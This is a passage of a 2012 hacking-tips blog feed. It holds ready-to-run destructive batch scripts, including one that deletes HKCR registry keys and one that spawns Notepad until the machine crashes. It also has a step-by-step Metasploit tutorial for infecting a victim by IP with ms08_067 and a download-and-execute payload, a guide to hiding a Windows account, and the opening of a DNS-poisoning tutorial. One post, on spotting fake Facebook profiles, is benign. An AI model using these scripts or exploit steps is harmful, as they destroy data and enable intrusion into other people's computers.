/q&lt;br /&gt;shutdown -r -f -t 00&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.bat&quot;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Stupidity Shutdown&lt;/span&gt;&lt;br /&gt;*This pops up a funny message then will shutdown the computer&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;@echo off&lt;br /&gt;msg * Fatal system error due to admin stupidity!&lt;br /&gt;shutdown -c &quot;Error! You are too stupid!&quot; -s -t 10&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.bat&quot;&lt;br /&gt;&lt;br /&gt;-&lt;span style=&quot;font-size: large;&quot;&gt;Delete Key Registry Files &lt;/span&gt;[NOTE THIS IS DANGEROUS!! USE AT RISK]&lt;br /&gt;*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;@ECHO OFF&lt;br /&gt;START reg delete HKCR/.exe&lt;br /&gt;START reg delete HKCR/.dll&lt;br /&gt;START reg delete HKCR/*&lt;br /&gt;:MESSAGE&lt;br /&gt;ECHO Your computer has been fcked. Have a nice day.&lt;br /&gt;GOTO MESSAGE&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.bat&quot;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Endless Notepads&lt;/span&gt;&lt;br /&gt;*This will pop up endless notepads until the computer freezes and crashes*&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;@ECHO off&lt;br /&gt;:top&lt;br /&gt;START %SystemRoot%\system32\notepad.exe&lt;br /&gt;GOTO top&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.bat&quot;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Crazy caps lock&lt;/span&gt;&lt;br /&gt;*This constantly turns caps lock on and off really fast continuously*&lt;br /&gt;CODE&lt;br /&gt;Set wshShell =wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys &quot;{CAPSLOCK}&quot;&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.vbs&quot;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Endless Enter&lt;/span&gt;&lt;br /&gt;*This constantly makes it so the enter button is being pressed continuesly*&lt;br /&gt;CODE&lt;br /&gt;Set wshShell = wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys &quot;~(enter)&quot;&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.vbs&quot;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Endless Backspace&lt;/span&gt;&lt;br /&gt;*This makes it so the backspace key is constantly being pressed*&lt;br /&gt;CODE&lt;br /&gt;MsgBox &quot;Let&#39;s go back a few steps&quot;&lt;br /&gt;Set wshShell =wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys &quot;{bs}&quot;&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.vbs&quot;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-Popping CD Drives&lt;/span&gt;&lt;br /&gt;*This will make the CD drives constantly pop out*&lt;br /&gt;CODE&lt;br /&gt;Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot;)&lt;br /&gt;Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;do&lt;br /&gt;if colCDROMs.Count &amp;gt;= 1 then&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next&lt;br /&gt;End If&lt;br /&gt;wscript.sleep 100&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;save it as &quot;Anything.vbs&quot;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/6586826601869167411/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-notepad-hacks-and-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6586826601869167411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6586826601869167411'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/some-notepad-hacks-and-tricks.html' title='Some Notepad Hacks and Tricks'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-pnm03djMppE/T1-ZqDsbxpI/AAAAAAAAACw/Qba9UBZQ4f4/s72-c/notepad-tricks.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-756154334536559831</id><published>2012-03-15T01:30:00.000+05:30</published><updated>2012-03-15T15:25:46.136+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="infect"/><category scheme="http://www.blogger.com/atom/ns#" term="IP Address"/><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit"/><title type='text'>How to infect victim using his IP address</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.olive-it-services.com/resources/PCVIRUS.jpg&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Many of the times I saw this question asked everywhere on the internet that&lt;br /&gt;“Is it possible to infect victim using his IP address?”&lt;br /&gt;&lt;br /&gt;So, I am going to show you how to do it.(n00b friendly TuT)&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Requirements:&lt;br /&gt;&lt;br /&gt;Nmap&lt;br /&gt;Metasploit&lt;br /&gt;&lt;br /&gt;First of all you need target ip of your victim.&lt;br /&gt;&lt;br /&gt;Then open Metasploit Console &amp;amp; type db_create.&lt;br /&gt;[Use: This’ll create or connect you to database.]&lt;br /&gt;&lt;br /&gt;Once you do that type Nmap.&lt;br /&gt;[Use: This’ll load Nmap in Metasploit Console]&lt;br /&gt;&lt;br /&gt;Next you need to type db_nmap -sT -sV &amp;lt;target ip&amp;gt;&lt;br /&gt;[This’ll scan OS, Ports, and Services running on victim’s computer.]&lt;br /&gt;Wait for 5 min’s to complete its scan.&lt;br /&gt;Once done, Note down the OS, Ports, and Services running on victim’s computer.&lt;br /&gt;&lt;br /&gt;Now it’s time to exploit victim’s machine.&lt;br /&gt;Exploit depends on the OS, Ports, and Services running on victim’s computer.&lt;br /&gt;So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.&lt;br /&gt;No matter weather they’re protected by any firewall or not.&lt;br /&gt;&lt;br /&gt;Now I’ll tell you exploiting:-&lt;br /&gt;&lt;br /&gt;Windows 2000 (all versions SP1, SP2, SP3, SP4)&lt;br /&gt;Windows XP (all versions SP1, SP2, SP3)&lt;br /&gt;&lt;br /&gt;Type show exploits&lt;br /&gt;[Use: This’ll show all the exploits in its database.]&lt;br /&gt;&lt;br /&gt;Next you need to type use windows/smb/ms08_067_netapi&lt;br /&gt;[Use: This’ll select the exploit windows/smb/ms08_067_netapi]&lt;br /&gt;&lt;br /&gt;Now Type show targets&lt;br /&gt;[Use: This’ll show all targets by exploit]&lt;br /&gt;&lt;br /&gt;Now Type set target 0&lt;br /&gt;[Use: This’ll set target to 0 specified]&lt;br /&gt;Then type show payloads&lt;br /&gt;[Use: This’ll bring up all the payloads]&lt;br /&gt;Next type set payload windows/download_exec&lt;br /&gt;[Use: This’ll set payload as windows/download_exec]&lt;br /&gt;&lt;br /&gt;Then Type show options&lt;br /&gt;[Use: This’ll show all options in the exploit &amp;amp; payload]&lt;br /&gt;In window you’ll see many options, in which you need to&lt;br /&gt;Fill only two options RHOST &amp;amp; URL.&lt;br /&gt;&lt;br /&gt;Type set RHOST &amp;lt;xxx.xxx.xxx.xxx &amp;gt;&lt;br /&gt;[Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]&lt;br /&gt;&lt;br /&gt;Next Type set URL http://www.xxxx.com/xxx.exe&lt;br /&gt;[Use: This’ll set URL to your direct server link.]&lt;br /&gt;&lt;br /&gt;At last you need to type exploit&lt;br /&gt;[Use: This will launch your exploit &amp;amp; your victim will be infected.]&lt;br /&gt;&lt;br /&gt;You can now control you&#39;re victim with RAT.&lt;br /&gt;So, any versions of Win 2000-XP can be exploited easily.&lt;br /&gt;&lt;br /&gt;In case if you didn’t get this two OS’, immediately after Nmap scan&lt;br /&gt;You can use the command db_autopwn –p –t –e.&lt;br /&gt;In most cases you get a shell.&lt;br /&gt;Good Luck! &amp;nbsp;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-IhPdYaYqq84/T13EvVm7XyI/AAAAAAAAABo/47aZfG4G4qM/s1600/thumbsup.gif&quot; /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/756154334536559831/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-infect-victim-using-his-ip.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/756154334536559831'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/756154334536559831'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-infect-victim-using-his-ip.html' title='How to infect victim using his IP address'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-IhPdYaYqq84/T13EvVm7XyI/AAAAAAAAABo/47aZfG4G4qM/s72-c/thumbsup.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-2611364059509128943</id><published>2012-03-14T13:00:00.000+05:30</published><updated>2012-03-14T13:00:00.359+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>How To Create A Invisible Account In Windows Xp</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-YL62UhwCOV4/T1-Xpc1l3VI/AAAAAAAAACo/BGQarF8WvFY/s1600/broken-windows-xp.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;http://1.bp.blogspot.com/-YL62UhwCOV4/T1-Xpc1l3VI/AAAAAAAAACo/BGQarF8WvFY/s320/broken-windows-xp.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Here is a Quick tutorial on for windows XP on How To Create A Invisible Account In Windows Xp. What we have do in this hack is really simple just create a DWORD value in the windows registry and hack the windows user accounts .&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-2nr2L6k1V5g/T1-WXd5ON7I/AAAAAAAAACg/Nc9upyBp5P8/s1600/hide_winXP.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;http://1.bp.blogspot.com/-2nr2L6k1V5g/T1-WXd5ON7I/AAAAAAAAACg/Nc9upyBp5P8/s320/hide_winXP.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Steps :-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Open Start menu then click on RUN.&lt;br /&gt;2. Type in the Run Window Regedit&lt;br /&gt;3. Windows Registry editor will open then navigate from the left panel :&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserLi​st&lt;/blockquote&gt;&lt;br /&gt;4. Create a new DWORD, setting its name to the name of the account you wish to hide.&lt;br /&gt;5. Then set its value to 0 to hide it.&lt;br /&gt;6. Enjoy its Hidden !!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTE :&lt;/b&gt; This account isn&#39;t completely hidden because it is visible to administrators in Local User and Groups and also the profile is visible in the Documents and Settings.&lt;br /&gt;&lt;br /&gt;Now How To Login In it after you have hidden the account :&lt;br /&gt;&lt;br /&gt;1. At Welcome screen, and you want to login to this account.&lt;br /&gt;2. Press Ctrl+Alt+Delete twice and it will display the log-on promt.&lt;br /&gt;3. Type the username, and the password and hit enter.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Comment If you like the post.. :)&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/2611364059509128943/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-create-invisible-account-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2611364059509128943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2611364059509128943'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-create-invisible-account-in.html' title='How To Create A Invisible Account In Windows Xp'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-YL62UhwCOV4/T1-Xpc1l3VI/AAAAAAAAACo/BGQarF8WvFY/s72-c/broken-windows-xp.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-2240362190700716854</id><published>2012-03-14T12:00:00.000+05:30</published><updated>2012-03-14T12:00:02.481+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>How to Detect Fake Facebook Profile</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-MFRRv5n3D1U/T1-V40h02jI/AAAAAAAAACY/zvxs27FU1Bs/s1600/(Fake_Profiles).jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;255&quot; src=&quot;http://2.bp.blogspot.com/-MFRRv5n3D1U/T1-V40h02jI/AAAAAAAAACY/zvxs27FU1Bs/s320/(Fake_Profiles).jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;In Facebook, things are not all as it seems: there are people who are under false names, pictures, interests and even friends. You look at their profile and think “something here does not fit.” These characters seek to trick legitimate users the purpose of sending unsolicited advertising, steal personal information or engage in various scams.&lt;br /&gt;&lt;br /&gt;We present a few simple rules to identify fake profiles on Facebook and prevent you from falling prey to this schemes. It’s easier than you think.&lt;br /&gt;&lt;br /&gt;A fake profile of Facebook users actively seeks out others, sending friend requests, liking pages and posting messages on walls outside.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here is something that stands out: no friends in common. What do you know about this guy? How did he/she get to you? The typical user of Facebook joins the invitation of a friend or relative, and often conduct their activities in a well-defined network. Unlike the case of people coming for other purposes.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-u_6-kkYUnnU/T1-S9VbZWUI/AAAAAAAAACI/3LdXMt5oTQ4/s1600/fake-facebook-profiles.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;335&quot; src=&quot;http://4.bp.blogspot.com/-u_6-kkYUnnU/T1-S9VbZWUI/AAAAAAAAACI/3LdXMt5oTQ4/s400/fake-facebook-profiles.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;First look at such profile os even more strange because it is a profile made ??quick and running, all mask, which knows little and says nothing about the person by which you can relate. No more pictures of profile, or if more are not related to each other and have not been labeled by other users or applications.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;Main Features of Fake Facebook Profiles&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;1. Profile Photo of some Celebrity / cartoon ( Something Unreal)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;Few can resist the temptation to accept the friendship of a good-looking person, especially if the opposite sex and generous areas of skin showing. However, this is the first thing to put on notice. Would the person you know use that picture? You are adding nothing more than junk to your friend list.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;2. Single Profile Photo Album&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;Most fake profiles have only one or two photographs. To give a sense of verisimilitude, the most skilled rogue attempts to fill photo albums of all kinds, but, here’s the problem, the result difficult to get consistent. The images are of poor quality, without descriptions, tags or comments.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3. Too many friends on such Profile&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;The details of a fake profile, if they have been refilled, are mostly generic and focused on a single topic or set of issues that appeals to a specific audience, and the same applies to the pages. In summary, the fake profile corresponds to a personality extremely boring. But then how is it that has so many friends? A mystery.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4. Analyze the Friend List&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;Unless you travel a lot or you like learning new languages, the safest thing is you have less than 200 friends and most live less than a thousand miles from home. If the person adds you have dozens of friends scattered all over the world, thinking that it is a fake profile is reasonable.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5. Meaningless and incomplete Profile Information&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;It generally consists of Friends, Single, Looking for Relationship and profile is Open to all. Even Wall Posts will consist of crappy posts by applications and similar people like you who became victim. These Messages include ” Hello” ” How are you?”, “Do we know each other”, etc. OR Site Advertorials.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;What to do if someone adds you do not know&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;Above all, do not panic! If someone adds you and do not know who he is, because you do not immediately accept the request, is now Facebook allows you to hide the requests instead of rejecting them. Another thing you can do is ask the contact what you know.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;And if you prefer not to ask anything, for your name in Google and see what happens. Finally, keep in mind the golden rule of Facebook: just add acquaintances.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;How to report Fake Facebook Profile&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;On Facebook, report and blocking a fake profile is very simple. In the sidebar of the profile in question, click on “Report / block this person” and select appropriate option. You can also block the person (well, you’ll never be able to add).&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-HibUyv7_LZA/T1-TiYQtJNI/AAAAAAAAACQ/oCXmVQ_o8Cc/s1600/fake-facebook-profile2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;209&quot; src=&quot;http://3.bp.blogspot.com/-HibUyv7_LZA/T1-TiYQtJNI/AAAAAAAAACQ/oCXmVQ_o8Cc/s320/fake-facebook-profile2.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;So, these were some common signals of Fake Facebook profile. As your experience grows, you will become wiser to detect them in just one look.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/2240362190700716854/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-detect-fake-facebook-profile.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2240362190700716854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/2240362190700716854'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-detect-fake-facebook-profile.html' title='How to Detect Fake Facebook Profile'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-MFRRv5n3D1U/T1-V40h02jI/AAAAAAAAACY/zvxs27FU1Bs/s72-c/(Fake_Profiles).jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-7300986446266376229</id><published>2012-03-14T00:30:00.000+05:30</published><updated>2012-03-14T00:30:03.557+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cain"/><category scheme="http://www.blogger.com/atom/ns#" term="DNS Poisoning"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="Hack"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>How To Perform DNS Poisoning attack</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-F4nX-WCP0q0/TZS1mK9aPyI/AAAAAAAAAbo/MMelOHDnFgM/s1600/poison_sign.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;264&quot; src=&quot;http://3.bp.blogspot.com/-F4nX-WCP0q0/TZS1mK9aPyI/AAAAAAAAAbo/MMelOHDnFgM/s320/poison_sign.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain &amp;amp; Abel.&lt;br /&gt;&lt;br /&gt;Download Cain &lt;a href=&quot;http://www.oxid.it/cain.html&quot;&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This Tutorial Will be limited to just redirecting the traffic to another website.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;First What is the DNS ? (wikipedia.org)&lt;br /&gt;&lt;br /&gt;The Domain Name System (DNS) is a hierarchical naming system for&lt;br /&gt;computers, services, or any resource connected to the internet or a&lt;br /&gt;private network. It associates various information with domain names&lt;br /&gt;assigned to each of the participants. Most importantly, it translates&lt;br /&gt;domain names meaningful to humans into the numerical (binary)&lt;br /&gt;identifiers associated with networking equipment for the purpose of&lt;br /&gt;locating and addressing these devices worldwide. An often used analogy&lt;br /&gt;to explain the Domain Name System is that it serves as the &quot;phone book&quot;&lt;br /&gt;for the Internet by translating human-friendly computer hostnames into&lt;br /&gt;IP addresses. For example, http://www.example.com translates to 208.77.188.166.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;What does poisoning the DNS allow us to do ?&lt;br /&gt;&lt;br /&gt;It allows us to redirect the traffic to another website.&lt;br /&gt;&lt;br /&gt;&lt;br 